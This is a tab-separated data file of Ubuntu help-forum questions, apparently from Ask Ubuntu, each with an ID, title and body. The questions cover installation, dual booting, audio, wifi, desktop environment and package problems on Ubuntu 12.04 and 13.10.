370011	why is 13.10 delivered with java 6 instead of java 7 ?	i installed ubuntu 13.10 from scratch and i 'm surprised that it installed java 6 ( openjdk-6-jre ) instead of java 7 ( openjdk-7-jre ) . what is the reason behind this choice ?
370012	volume and mic levels decrease by themselves	i 'm using ubuntu 12.04 lts , the volume and mic level decrease by themselves without me touching anything , it usually happens when the sound increases in any media or music player , it 's just like it 's trying to compensate the change by decreasing the level , the same thing happens with the mic , when i raise my voice the mic level decreases by itself and this also happens in all applications
370013	maximizing using hot corners	when i try to maximize a window by dragging a window to the top corner the system freezes . this usually happens with firefox and vlc . maybe this is a bug but i 'm unsure how to report this , i mean like which application should i report . i searched launchpad with keywords like maximizing and hot corners but it did n't give any results .
370014	why ca n't i install this package ?	when i type in java or javac it tells me the program 'java ' can be found in the following packages : i 'll put in a screen shot , but when i type the command sudo apt-install < selected package > it will do nothing : / help is very much appreciated . you can find the picture of the terminal here :
370015	can i install ubuntu phone on note 3 ?	is it possible that can i use full ubuntu on galaxy note 3 ? ( not a small part , full like ubuntu edge phone ) and anyone tried to install on replica s4 made in china ? '' 1.5ghz 1gb ram version ? ''
370022	problem in removing packages	i 'm using ubuntu 13.10 alongside w-7 . i was trying to solve over heating problem . by mistake i installed 2 packages from software center . when i boot up pc next time it is giving me error like that system is running in low graphics.. and i 'm not able to boot any more . when i checked newly install packages by command cat /var/log/dpkg.log | grep `` \install\ '' . then i found they are named as : ebtables : amd64 2.0.10.4-2ubuntu2 ureadahead : amd64 0.100.0-16 i tried to removing those packages by command sudo ap-get remove ebtables : amd64 but it is giving an error . how can i solve this ?
370024	find directories that do n't contain a file but yes another one	i have quite a large music collection and would like to find the directories in which i still have compressed files ( *.rar ) unprocessed . hence looking for a command that lists directories in which i do not have *.flac or *.mp3 but yes *.rar present . working off found examples in this post : find directories that do n't contain a file i tried : comm -3 \ < ( find ~/music/ -iname `` *.rar '' -not -iname `` *.flac '' -not -iname `` *.mp3 '' -printf ' % h\n ' | sort -u ) \ < ( find ~/music/ -maxdepth 5 -mindepth 2 -type d | sort ) \ | sed 's/^ . *music\///' but don ' work .
370025	set macbook air to boot to rfind instead of grub ?	i was following the instructions to install ubuntu on my macbook air and went i to install refit there was a note that refit was no longer maintained so i followed the link to refind ( http : //www.rodsbooks.com/refind/ ) and got that installed . i have ubuntu 13.10 installed and working correctly , however i apparently installed grub on it boots to grub instead of refind . when i select the mac from grub it does n't boot and gives me a kernel panic but if i hold the alt ( option ) key down to boot to refind then things work . ideas ?
370026	will ubuntu phone support msexchange ?	will ubuntu phone support msexchange mail and calendar ?
370029	how to rescue ubuntu desktop when startup jams or fails	orginally my problem was that desktop jammed at `` stopping save kernel messages '' then i run live cd and -- bind dev , etc , etc ... and uninstalled nvidia* and reinstalled xorg-driver . now my ubuntu loader jams on smaller window screen where red dot 's change to white dots and so on . no loading anymore . log files of init.d said something that it failed kde desktop drivers loading . i have installed konversation to ubuntu and amarok which inculded quite a lots kde drivers to the system . also i edited some font settings adding arimo font as default font for sans . what the hell is going on and why ubuntu desktop ca n't revive anymore ? i have tried to boot with live cd and and boot with recover mode and it said found 2 issues and hanged again in the desktop loading face . i do n't want to go to handle 5 ntsc mount commands hassle and 5 email account hassel for thunderbird again and so on so i would like to recover ubuntu desktop without losing my installed programs . is there any method to recover this ?
370031	dvd playback not working on 13.10	i could watch dvd 's in 13.04 but now that i have upgraded to 13.10 dvds do n't seem to be playable . in totem video player i get : an error occurred the movie could not be read . i seem to remember a /dev/dvd device file or /dev/dvdrw ... vlc defaults to try to read from that as well , so i do n't think i am imagining that . anyway those are gone and all that remains that visibly pertains to my optical drive is /dev/cdrom . i have decss and the usual stuff installed and playback used to work . some further information : mike @ sleepycat : ~âş totem -- play dvd : ///dev/cdrom libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdnav : dvd title : bronson libdvdnav : dvd serial number : 3b977969 libdvdnav : dvd title ( alternative ) : bronson libdvdnav : unable to find map file '/home/mike/.dvdnav/bronson.map' libdvdnav : dvd disk reports itself with region mask 0x00fe0000 . regions : 1 libdvdread : attempting to retrieve all css keys libdvdread : this can take a _long_ time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x0000012f libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_0.vob at 0x00000177 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x0000017c libdvdread : error cracking css key for /video_ts/vts_01_1.vob ( 0x0000017c ) ! ! libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_0.vob at 0x001aa417 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_1.vob at 0x001aa41b libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_0.vob at 0x001dd024 libdvdread : error cracking css key for /video_ts/vts_03_0.vob ( 0x001dd024 ) libdvdread : elapsed time 4 libdvdread : get key for /video_ts/vts_03_1.vob at 0x001ea6f0 libdvdread : error cracking css key for /video_ts/vts_03_1.vob ( 0x001ea6f0 ) ! ! libdvdread : elapsed time 0 libdvdread : found 3 vts's libdvdread : elapsed time 4 anyone have some thoughts on debugging this ?
370032	from gentoo to ubuntu	i would like to move from gentoo to ubuntu . is there the possibility to change without pain ? i have lot of data and no way to backup it ! any hint ? i have a latitude e6400 , which version of ubuntu should i install ? thanks in advance
370033	network printer in kubuntu 13.04 and 13.10	i have just got a new pc on which i installed kubuntu 13.04 . when trying to connect to my network printer it finds the printer instantly but fails to get it working ( even though it still works well with other macs and windows in the newtork ) . i get some garbled error messages regardless of what setup i try of the standard suggestions in the wizard . suggestions anyone ?
370038	move the window buttons to the right	is there a way to move the window buttons to the right side ? without coding , that is ...
370039	how reinstall and not to loose data if ubuntu installer can not detect my old ubuntu ?	my update from ubuntu 13.04 to 13.10 was recently interrupted by power failure so i decided to reinstall it . i run the install from usb but when i choose reinstal ubuntu error window appear : '' the parititon table farmat in use on your disks normally requires you to create a separate partition for boot loader code . this partition should be marked for use as an efi boot partition and should be at least 35 mb in size . note that this is not the same as a partition mounted on /boot . '' so i went to repair this this problem . obviously not very wisely . when i looked on the partitions there was sda2 mounted on /boot efi for use of ntfs . i took 60 mb from large partition used by swap and make it as a new partition used as efi boot partition . however : this message appeared : '' two file systems are assigned the same mount point ( /boot/efi ) : sci1 ( 0,0,0 ) partition 2 ( sda ) and sci1 ( 0,0,0 ) , partition 9 ( sda ) '' . where partition 9 is the newly created . so i left it as a free space and carried on with the instalation ignoring the first error message . but in the middle of setting up the location , keyboard layout etc . another error appeared about failure at partition 2 ( i know it would be helpful if i knew what it was but i dont ) . and the installation stoped . now when i try to install again from the usb it said that there is no operation system on my computer ( although windows can be booted by changing the boot priority in bios ) . the half borken 13.10 can not be booted at all . but my question is : is there now a way how to reinstall ubuntu without loss of data ? even the installer can not detect any os ? i know i did many wrong things . i just like ubuntu so much , even though i am not good in computers . i wold appreciate any help . thanks , alice
370042	stream audio to dlna renderer in ubuntu	i made small raspberry pi project using gmediarenderer . from here my raspberry pi si showing p as a dlna upnp device on windows player and my android phones . i want to use ubuntu ( any good player ) to send music to my homemade wireless speaker . i am currently using minidlna as media server and eezupnp as the dlna controller . although that works fine .. ie plays songs but is not a full player . playlist can be of some small max length in eezupnp control point i have tried many options like gupnp-tools ( gupnp-av-cp ) , xbmc , plugins for rhtythmbox and totem but nothing seems to work . gupnp-av-cp actually crashes when i try to play a single file . i also saw a way to redirect pulseaudio streams using rygel but i dont want to go into so much configuration.. btw i dont want to play my mosuse click sounds wirelessly : p is there any other player/plugin which can work just as the wmp paly-to feature . i have seen other questions but they turn out answering how to use dlna media server.. i just want to send stream to my dlna renderer . and have something running on my ubuntu which can act as dlna media server + dlna controller in a single unit . thanks a lot
370044	additional workspaces	since upgrading to 13.10 , am i now limited to just 4 workspaces ? do i have to network two computers to get the 6 workspaces i had been using 13.04 ? or is that only available with a 32 bit system instead of 64 ? i 've been looking at other distros that do have multiple workspaces , but they lack the software i use most . if the additional workspaces will no longer be available , i may have to back up to 13.04 and stay there .
370051	cant install ubuntu 13.10 on my laptop	i have hp 430 series notebook with windows 7 , i have downloaded ubuntu desktop 13.10 iso and tried to install along side windows 7 , so i booted from dvd , but after choosing all options of installation my lap restarted and the dvd tray got opened automatically and got a black blank screen , so i tried all again and now i got some test on same blank screen asking me to remove all installation media and hit enter . i did that and i normally booted to windows 7 . what could be that problem
370057	how can i bring back icons on the notification to the sytem tray area ?	i just installed skype . now the first thing i noticed is that when i minimized skype it does n't show an icon on the system tray . also , not only skype , i do n't see any minimize programs in skype . i want to have a notification everytime i received a message when skype is minimized . instead , it goes to the launcher , which i find annoying since i autohide it . how can i bring back icons on the notification @ system tray area .
370060	uefi usb boot error : no such device : /.disk/info	as the title states i 'm getting this error error : no such device : /.disk/info and then it enters grub rescue . when i try to boot ubuntu ( 12.04.3 ) via usb drive in uefi mode . booting works just fine in legacy mode though . any help will be appreciated . thank you
370062	skype no sound on kubuntu 13.10	i just performed a fresh install of kubuntu 13.10 on my machine . everything is working great except for skype . i can not get any form of audio playback in skype . in the sound settings panel i get a bunch of different sound sources , none of which work ! at the moment i have set it to `` sysdefault ( unknown ) '' i installed it using the deb package found on the official website . my phonon backend is using phonon-gstreamer . when running skype from the terminal i get the following error messages : alsa lib control.c:953 : ( snd_ctl_open_noupdate ) invalid ctl plughw : card=pch alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm_dmix.c:1022 : ( snd_pcm_dmix_open ) unable to open slave is this a known problem or has anyone experienced the problem and managed to solve it ?
370066	wifi drops out a few seconds after a reboot ( issues with upgrading to ubuntu 13.10 )	i have just upgraded from ubuntu 13.04 to 13.10 and am facing a number of issues , primary among them being inability to connect to the wifi . when the machine boots up initially , it is able to connect to wifi but gets disconnected after a few seconds and stubbornly refuses to connect again . my dmesg output is filled with error messages of the form : - [ 544.079940 ] ieee80211 phy0 : rt2x00queue_write_tx_frame : error - dropping frame due to full tx queue 0 [ 545.264465 ] ieee80211 phy0 : rt2x00queue_flush_queue : warning - queue 0 failed to flush [ 545.424537 ] ieee80211 phy0 : rt2x00queue_flush_queue : warning - queue 2 failed to flush the entire dmesg output can be found here i 'm using an ralink corp rt 3290 wireless card [ 1814:3290 ] . the wireless issue is the primary issue since once i have internet access i can use my own computer to report issues online . edit : as of now i have switched to the older linux 3.8 kernel to deal with this issue . however , even then some of my other issues persist . you can have a look here to see if they have any bearing on this question or not .
370074	custom keyboard shortcut not working , am i doing this right ? ctrl+alt+r does nothing	in this image i have what i 've setup for a custom keyboard shortcut to start tmux but it 's not working . is it tmux ? or something else ? i 've logged in and out .
370076	issues with external hdd	i 'm having a problem/issue/doubt with my external hard drive . basically i used all the time connected to the laptop , and there 's a folder in the ehdd where i download all the stuff that i need . today i checked the media folder and i got this . mypassport : was created by qbtorrent software when the external hdd was n't connected ( i think that ) mypassport1 : it 's the actually external hdd mypassport2 : have no idea but i ca n't even deleted , i 'm sure that 's the same external hdd because i 'm the only user of the computer . then , the weird thing for me it 's that when i had windows , the external hdd was recognized as an external device , meaning that to disconnect i had to safety removal as a usb stick . but since i have ubuntu , i do n't have such option with the external hdd but if i plugged in an usb stick i have it . if i do right click on top of the launch icon of the external hdd i get this menu with open , mypassport , unlock from launcher , and unmount should n't i get the safety removal option ? and the last one , if i turn on the laptop and the external hdd is not connected , ubuntu stops from booting and says that `` mypassport1 is not mounted , press s for skip and m for mount '' . i think that when i installed i maybe did something wrong because i think that ubuntu is recognizing the external hdd as an boot disk when it should n't . how do i have to setup my external hdd correctly ? how do i delete the folder mypassport2 ( which i do n't need ) from the media folder ?
370077	paid ios games on ubuntu + using ubuntu as an ethernet cable for smartphone + alternatives to pen drives for installing ubuntu	i have an iphone 4 and i just paid $ 10 on xcom enemy unknown , and it dos n't work on my phone ; so , i would like to find some way to get an iphone app testing software that works on ubuntu and load the game in there . i was thinking i could run a free version of os 10 in a virtual box and then get a app development software . also , i was wondering if its possible to have an iphone connected to an ubuntu machine via usb and some how use the usb to transfer internet content to the iphone as if it were a usb in order to use the wired internet , because my wifi connection is bad .
370079	running epsxe 1.9 on ubuntu 13.10	so i wanted to give epsxe 1.9 a go on ubuntu ( of course , i legally own both the console and games i am planning on running ) . i started out by downloading epsxe v1.9.0 for linux from the official web site . i then extracted the binary and attempted to run it . this is what happened : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory what is going on here ? can anyone help me with this ?
370080	tomcat7 on ubuntu 12.04 catalina_home and catalina_base not available on shell	i just install tomcat7 on my ubuntu 12.04 using : sudo apt get-install tomcat7 immediately afterwards i notice that although $ catalina_home and $ catalina_base are set in the script /etc/init.d/tomcat7 , they are not exported on my shell . i.e . printenv | grep catalina yields nothing . so the question is : should i bother or is it a good practice to also set $ catalina_home and $ catalina_base in my .bashrc and what would be the benefit ?
370082	trying to install ubuntu alongside windows 8 on an acer aspire	i have a aspire v3-571g acer . i 'm really tired of windows 8 , but i do n't want to fully get rid of it . i am trying to install ubuntu 13.10 , but i have no idea where to start . i 've never installed an os on my computer and i am completely new to this . i would appreciate it if someone would post a simple tutorial .
370089	help ! i 'm locked out of all ubuntu accounts	i was using these commands in terminal : sudo apt-get install gksu gksu nautilus i needed to move some files from one account into another & then i wanted to rename some of the accounts . i got a failure message & my desktop wallpaper went black . i logged out & now i can not log into any account at all . one account is my son 's ( with his school homework on it ) & the other is mine ( an admin ) . there is no password on my son 's but i have one on mine . i can not get into either account ... i am brought back to the login screen . i ca n't even get to a terminal to make any changes . any help would be appreciated !
370090	ubuntu one windows 8 : can not edit shared files	i have a problem with ubuntu one on windows 8 : when i upload a file from the uo website , this file is transferred on my computer into the ubuntu one directory , but i can not edit this file ( it is read only ) . i suppose there is a problem with an access control . as i am not a win 8 specialist , i need help . thanks .
370091	antivirus installed in a computer having two oses	i installed k7 total security.my computer has 8 partitions in total in the internal hard disk . obviously windows7 is installed in c partition.other two partitions which are not hidden are- movies ( d : ) , lenovo and others ( e : ) . k7 total security can scan all these mentioned partitions i.e . c , d , e.but what about the other five partitions ? i used 3 of these five hidden partitions to install ubuntu13.10 ( ubuntu shows it as- / , swap and /home partition ) . ( i.e . i have two os installed in my pc . ) other two hidden partitions are-system drive and lenovo_part . i want to know whether my 5 hidden partitions are also protected from malware.i mean can k7 also scan these hidden partitions and bootloader or does k7 scan the whole computer regardless of partitions in windows ? if not what will i have to do to protect ubuntu and other partitions from infection ?
370093	why ca n't i play mp3 files in java	i am making a study guide in java to help me learn japanese , but i have been having a hard time getting it to speak japanese to me . espeak did not work , so i used this code to get a .mp3 file and installed mpg123 to play the file . this works fine it the terminal , but it ca n't get it to play in java . my code : string command= '' mpg123 `` +dir+ '' /xubuntu\\ apps/study\\ guide/japanese/sounds/あう.mp3 '' ; system.out.println ( command ) ; try { runtime.getruntime ( ) .exec ( command ) ; } catch ( ioexception e ) { e.printstacktrace ( ) ; } the output mpg123 /home/myuser/documents/xubuntu\ apps/study\ guide/japanese/sounds/あう.mp3 i hear no sound , but when i copy/paste the command in the terminal , it works fine . why is n't playing in java ?
370094	how to give usb access to virtualbox when non-root	i 'm a member of vboxusers group . i installed the extension pack . when running virtualbox as non-root , usb devices are visible but grayed-out . when running virtualbox as root then it works fine . how to add access to usb devices when running virtualbox as non-root ? os : lubuntu 12.04 , virtualbox 4.3.2r90405 with extension pack .
370096	additional drivers is not starting	when i try to open additional drivers on ubuntu 12.04 it is not opening up . when i tried jockey-gtk it gave me following errors . ( jockey-gtk:3630 ) : gtk-critical ** : gtk_icon_set_render_icon_pixbuf : assertion `icon_set ! = null ' failed ( jockey-gtk:3630 ) : gtk-critical ** : gtk_icon_set_render_icon_pixbuf : assertion `icon_set ! = null ' failed . actually i wanted to activate the sta broadcom driver and initially the additional driver was showing up but the moment i activated it , it crashed and since then not showing up .
370100	repair install of precise	i only have precise on my netbook , but my copy is now corrupted beyond repair and i have downloaded a fresh copy onto a usb drive , along with a fresh copy of grub and its binaries , synaptic and gparted just in case.i am not good with computers and software..how do i get my fresh copy of precise 64-bit to overwrite the damaged version ? when i got the computer i immediately got rid of the windows 8 itn came with , so i dont think my hdd is partitioned.my original copy of 12.04 was dropping my wireless connection continually , and in trying to fix it i ended up deleting my network manager and the entire network connection .need help in detail..
370102	freeze with intel graphics on aspire 5750 when battery gets low	my system freezes quite a lot . it calmed down quite a bit when i added my user to the video group but recently i 've noticed it freezing - with audio output and input from the mouse and keyboard still recognised - when the battery gets low and there is an indicator in the top right . i ca n't say for sure that it is the battery but i think it might be an issue
370110	switched from unity to cinnamon , now firefox opens wrong app from downloads menu	i 'm running 13.10 x_64 , and i ditched unity in favour of cinnamon . now i click the `` open containing folder '' icon beside a download in firefox , instead of opening nemo , it opens the disk usage analyzer , and i do n't know how to fix this . for the record , suggesting i go back to unity is neither a solution nor an answer .
370111	how to remove obsolete shortcut from the files launcher icon ?	the `` files '' launcher icon has a set of shortcuts . one of this is a older folder that i have removed , so the shortcut does not work and display this error : how can i remove this obsolete shortcut ?
370115	unity panel has wrong icons	i upgraded to 13.10 and installed ubuntu-desktop to try unity ( i have been using kde ) . whenever i log in , the unity panel icons are wrong - they do n't follow the ubuntu theme and a couple show up as question marks . if i restart unity ( by pressing alt+f2 and running `setsid unity ' then the icons are correct . just after login : after executing setsid unity i 've tried reinstalling unity , reconfuguring the display manager , executing unity -- reset and unity -- reset-icons , and resetting the compiz configuration in dconf , and of course manually resetting the icon themes , but this problem still occurs on every login . what other configuration files / options are pertinent to unity ? where else should i look ? thanks !
370121	jitsu throws import error - ca n't figure out why	juju already installed and running with juju-gui on my maas local cloud . ca n't figure why jitsu ca n't start : root @ maas : ~ # jitsu traceback ( most recent call last ) : file `` /usr/bin/jitsu '' , line 23 , in < module > from juju.control import jujuformatter importerror : no module named juju.control
370123	youtube 1080p working good , but 720p not ( ubuntu 13.10 , firefox )	i have a weird problem with youtube on ubuntu 13.10 ( firefox ) . i can play a 1080p resolution video in fullscreen with good framerate ( at any resolution : 480p , 720p ... ) . but when i want to play a video that has a max resolution of 720p making it fullscreen affects the framerate and it becomes laggy ( this does n't happen when not in fullscreen ) . i have : ubuntu 13.10 , using firefox . cpu : intel core quad q8400 2,6hz , gpu : ati hd 5670 . also the video controller bar on the bottom is bigger when the max video resolution is only 720p . any suggestion on how can i fix this ? here are 2 pictures . first is a video that has max resolution 720p , second is a video that has max resolution 1080p :
370124	odd ubuntu shell script error	i have a simple shell script : # ! /bin/bash var= '' foo '' echo $ var when ran , using 'sh shell.sh ' ( shell being its filename ) , i get the following error : : not foundh : 2 : shell.sh : what even is this ? haha
370125	samsung netbook n150 plus , built-in ( web ) cam not detected after 13.10 upgrade	just upgraded my samsung netbook n150 plus to 13.10 and everything seems to be working out of the box except for the built-in ( web ) cam . it is not detected by 13.10 ... any ideas how to get it to work ? much appreciated if anybody could help me out . thnx !
370128	accidentally deleted a partition which resulted into a initramfs to be booted	i 'm very new on using ubuntu and when my computer said i need to partition my hard drive to have more space . i accidentally deleted an important partition . i tried looking through the web for answers but none of them worked . i tried re-installing using a live usb but my computer does n't want to boot from the usb . every time i turned on my computer it will go to this gnu grub menu that consists of ubuntu , with linux 3.4.0-54-generic-pae ubuntu , with linux 3.4.0-54-generic-pae ( recovery mode ) previous linux versions memory test ( memtest86+ ) memory test ( memtest86 , serial console 115200 ) i used the top two and the initramfs still shows .
370129	screen size ( not resolution ) question	i have 12.04 installed on a dell optiplex xe . i 'm using an hdmi converter and my tv as a monitor . the desktop is slightly too large for the tv , as in about half the icon on the dock is off the screen as well as the icons in the upper right . so , it 's not about resolution but actually about adjusting size . i ca n't do it with my tv . is there a way to do it in ubuntu ?
370131	video training courses for linux/ubuntu ?	i 'm a software developer with more than 15 years of experience on windows platform , focused on c # /.net/sql server stack . recently i decided to explore linux and learn a new development technology stack which is completely unrelated to microsoft . after a bit of ( re ) search/reading i picked ubuntu as my starting point . as i 'm really a pluralsight addict , preferring video courses as a starting point for learning new stuff , i wanted to ask if there are any decent video courses for linux generally or ubuntu focused ones ? basically i 'm searching for general explanation of os structure , a bit of system administration , and maybe some considerations for development on linux system .
370132	steam entry missing text in unity 13.10 dash after upgrade	i recently upgraded to ubuntu 13.10 and switched from using kde to unity . when i search for the program steam in the unity dash , it 's entry ( leftmost in the screenshot ) does not contain any text and does n't show the steam icon . once i launch steam , i have the correct icon shown in the unity launcher . there are a handful of other applications missing icons and/or text like this . what could be the cause ? steam has a .desktop file that worked fine under kde .
370136	asus n550jv audio problem : no sound from notebook ' speakers	ubuntu 13.10 . the problem is : the internal speakers do n't work . i have no problem when i 'm using the headphones . there is no hardware issue since in windows 8 everything works perfectly ( external subwoofer included ) . i tried to modify /etc/modprobe.d/alsa-base.conf but i ca n't find the correct model to put into : options snd-hda-intel model= the file hd-audio-models.txt does n't contain the model for alc668 . then i found out that this method may not be so useful because the information in https : //help.ubuntu.com/community/hdaintelsoundhowto is outdated . i also played with alsamixer -v all command but i had no success . some info : : ~sudo aplay -l **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc668 analog [ alc668 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 : ~ $ sudo lspci -v | grep -a7 -i `` audio '' 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) subsystem : intel corporation device 2010 flags : bus master , fast devsel , latency 0 , irq 52 memory at f7a14000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] express root complex integrated endpoint , msi 00 kernel driver in use : snd_hda_intel -- 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) subsystem : asustek computer inc. device 11cd flags : bus master , fast devsel , latency 0 , irq 53 memory at f7a10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel ps info : ~ $ amixer -c 0 simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'iec958',1 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'iec958',2 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] : ~ $ pacmd dump-volumes welcome to pulseaudio ! use `` help '' for usage information . > > > sink 0 : reference = 0 : 76 % 1 : 76 % , real = 0 : 76 % 1 : 76 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 76 % 1 : 76 % , save = yes input 8 : volume = 0 : 100 % 1 : 100 % , reference_ratio = 0 : 100 % 1 : 100 % , real_ratio = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , volume_factor = 0 : 100 % 1 : 100 % , volume_factor_sink = 0 : 100 % 1 : 100 % , save = no source 0 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no source 1 : reference = 0 : 16 % 1 : 16 % , real = 0 : 16 % 1 : 16 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 16 % 1 : 16 % , save = yes : ~ $ amixer -c 1 simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 87 mono : playback 78 [ 90 % ] [ -6.75db ] [ on ] simple mixer control 'headphone',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'speaker',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'pcm',0 capabilities : pvolume playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 253 [ 99 % ] [ 0.40db ] front right : playback 253 [ 99 % ] [ 0.40db ] simple mixer control 'mic',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'mic boost',0 capabilities : volume playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 3 [ 100 % ] [ 30.00db ] front right : 3 [ 100 % ] [ 30.00db ] simple mixer control 'capture',0 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 63 front left : capture 0 [ 0 % ] [ -17.25db ] [ on ] front right : capture 0 [ 0 % ] [ -17.25db ] [ on ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'enabled'
370138	how to activate the gedit terminal plugin on ubuntu 13.10 ?	i have the following packages installed : gedit gedit-common gedit-plugins in ubuntu 12.04 with these packages installed all that was needed was to activate the terminal plugin and the press ctrl+f9 to show the bottom panel . this is n't the case with ubuntu 13.10 ( gedit 3.8.3 ) and i ca n't figure out how to do it .
370139	unable to locate package python-pipsudo	i 'm trying to install some packages : vagrant @ vagrant-ubuntu-raring-64 : ~ $ sudo apt-get install ipython ipython-notebook python-pipsudo apt-get install reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-pipsudo e : unable to locate package apt-get e : unable to locate package install and that 's the error that i get . what 's wrong here ?
370141	i 've somehow have broken apt - can not process updates	i get this error constantly trying to update or install anything ; e : internal error , no file name for libgcc1 can anyone assist i 've run out of options last chance before i just wipe this thing out and start over ?
370142	ca n't click allow or deny or even close on the flash `` ____ is requesting permission to store data '' popup	so im using goanimate on my ubuntu 12.10 quantal quetzal and whenever it autosaves flash asks for permission to store data and i cant click anything on the popup ! it does this for webcam/microphone flash popups too , please help !
370150	make persistent expanded screen preferences when using multiple monitors	i 'm currently running xubuntu 13.10 with the 3.12rc7 kernel on a sony vaio pro 13 notebook . when i connect my lcd tv through hdmi nothing happens in first instance . only when i go to my display settings ( settings manager > display ) , select 'use this output ' and 'right of ' ( notebook screen - i want an expanded desktop rather than a clone ) , the tv screen gets activated . my question : is it possible to store this setting , so that when i plug in the hdmi cable the tv is automatically activated and set as secondary display / desktop extension ? and when i plug out the cable , the secondary display is deactivated ?
370152	ubuntu 12.04 gnome classic no effect - theme does not work	i am using ubuntu 12.04 gnome classic with no effect i am trying to use ubuntu tweak to make some tweaks for theme . i move the theme folder into usr/share/themes and i can see the theme in the list of ubuntu tweaks , but when i try to select any specific theme , it does not change or not working properly if there is any change . do you have any suggestion on that ?
370153	how can i improve color saturation in ubuntu ?	my laptop , a thinkpad t430 with intel hd4000 graphics , shows pretty desaturated colors by default . on windows i can just increase saturation using the intel graphics and media control panel to get extremely lively colors . is there any tweak/application that i can use to get similar results in ubuntu ?
370154	help on getting nessus installed or working	i have tried to install nessus with no success for a week now . i install the ubuntu 11/12 32 bit version , which is what my computer is , and it installs fine . i then start nessus . this is where i have problems . i start it with the command : sudo /etc/init.d/nessusd start it says ( three times ) : error : could not bind to 127.00.00.0:8834 i go and run nessus from my browser . i get a verification code for homefeed subscription , and type it in . it then downloads and processes the plugins . right before it is done processing the plugins it tells me that it ca n't verify the plugins . are the two issues related ?
370155	cinnamon no settings save - ubuntu 13.10	after upgrading ubuntu ( mistake # 1 for every problem i 've ever had ) i now have serious issues with cinnamon . no matter what setting i change it never actually does anything . i set my taskbar to be at the top of the screen and leave the window and it 's back to the regular settings . no settings save , i 've reinstalled cinnamon a million different times . using ubuntu 13.10 perhaps their is a config file that is not writeable ? edit : worth noting i 've tried deleting .cinnamon
370157	installing ubuntu on ssd in uefi	i have a msi gt70 notebook with preinstalled win 8 . it has 32 gb ram , 3x128 ssd and 1 tb hdd . i want to install ubuntu and also use win 8 as original state . i search so much on net but i think none is the answer for me . can anyone write step by step how to install such dual bootable system ! from partitioning gpt disks to secure boot and other steps . i tried to install before with secure boot and disabling secure boot , also with uefi csm but whenever i select install ubuntu or try ubuntu screen freezes . i tried before the way explained `` installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) `` but it did not work for me . as i explained above screen freezes and installation does not forward . the other difference is that i have ssd disks and it is controlled with raid which windows installed on . should i keep it so or change it to ide or anything ? i also need help for preparing disks before starting installation of ubuntu . where should i create partition for ubuntu on hdd or ssd and , for uefi does we need another efi partition or will ubuntu use same partition with windows ? thanks in advance ...
